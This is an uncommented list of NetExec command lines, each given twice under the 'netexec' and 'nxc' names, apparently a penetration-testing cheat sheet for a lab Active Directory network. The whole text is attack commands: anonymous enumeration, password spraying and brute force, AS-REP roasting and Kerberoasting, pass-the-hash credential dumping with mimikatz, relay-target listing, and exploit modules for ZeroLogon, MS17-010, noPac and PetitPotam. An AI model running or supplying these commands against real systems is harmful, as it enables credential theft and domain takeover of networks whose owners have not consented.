netexec smb --list-modules
netexec ldap "$DC_HOST" -d "$DOMAIN" -u "$USER" -p "$PASS" -M maq
netexec ldap "$DC_HOST" -d "$DOMAIN" -u "$USER" -p "$PASS"
netexec ldap "$DC_HOST" -d "$DOMAIN" -u "$USER" -p "$PASS" --asreproast ASREProastables.txt --kdcHost "$DC_HOST"
netexec ldap "$DC_HOST" -d "$DOMAIN" -u "$USER" -p "$PASS" --kerberoasting Kerberoastables.txt --kdcHost "$DC_HOST"
netexec smb "$TARGET" --continue-on-success --no-bruteforce -u users.txt -p passwords.txt
netexec smb "$TARGET" --continue-on-success -u users.txt -p passwords.txt
netexec smb "$TARGET" --local-auth -u "$USER" -H "$NT_HASH" -M enum_avproducts
netexec smb "$TARGET" --local-auth -u "$USER" -H "$NT_HASH" -M mimikatz
netexec smb "$TARGET" -u '' -p '' --pass-pol
netexec smb 192.168.56.0/24 --gen-relay-list smb_targets.txt
netexec smb 192.168.56.0/24 --local-auth -u '' -p ''
netexec smb 192.168.56.0/24 -u "$USER" -p "$PASS" --loggedon-users
netexec smb 192.168.56.0/24 -u "$USER" -p "$PASS" --sessions
netexec smb 192.168.56.0/24 -u "$USER" -p "$PASS" --shares
netexec smb 192.168.56.0/24 -u '' -p '' --shares
netexec smb "$TARGET" -u "$USER" -p "$PASS" -M noPac
netexec smb "$TARGET" -u "$USER" -p "$PASS" -M petitpotam
netexec smb "$TARGET" -u '' -p '' -M zerologon
netexec smb "$TARGET" -u '' -p '' -M ms17-010
netexec smb "$TARGET" -u '' -p '' -M ioxidresolver
netexec smb --list-modules
nxc ldap "$DC_HOST" -d "$DOMAIN" -u "$USER" -p "$PASS" -M maq
nxc ldap "$DC_HOST" -d "$DOMAIN" -u "$USER" -p "$PASS"
nxc ldap "$DC_HOST" -d "$DOMAIN" -u "$USER" -p "$PASS" --asreproast ASREProastables.txt --kdcHost "$DC_HOST"
nxc ldap "$DC_HOST" -d "$DOMAIN" -u "$USER" -p "$PASS" --kerberoasting Kerberoastables.txt --kdcHost "$DC_HOST"
nxc smb "$TARGET" --continue-on-success --no-bruteforce -u users.txt -p passwords.txt
nxc smb "$TARGET" --continue-on-success -u users.txt -p passwords.txt
nxc smb "$TARGET" --local-auth -u "$USER" -H "$NT_HASH" -M enum_avproducts
nxc smb "$TARGET" --local-auth -u "$USER" -H "$NT_HASH" -M mimikatz
nxc smb "$TARGET" -u '' -p '' --pass-pol
nxc smb 192.168.56.0/24 --gen-relay-list smb_targets.txt
nxc smb 192.168.56.0/24 --local-auth -u '' -p ''
nxc smb 192.168.56.0/24 -u "$USER" -p "$PASS" --loggedon-users
nxc smb 192.168.56.0/24 -u "$USER" -p "$PASS" --sessions
nxc smb 192.168.56.0/24 -u "$USER" -p "$PASS" --shares
nxc smb 192.168.56.0/24 -u '' -p '' --shares
nxc smb "$TARGET" -u "$USER" -p "$PASS" -M noPac
nxc smb "$TARGET" -u "$USER" -p "$PASS" -M petitpotam
nxc smb "$TARGET" -u '' -p '' -M zerologon
nxc smb "$TARGET" -u '' -p '' -M ms17-010
nxc smb "$TARGET" -u '' -p '' -M ioxidresolver

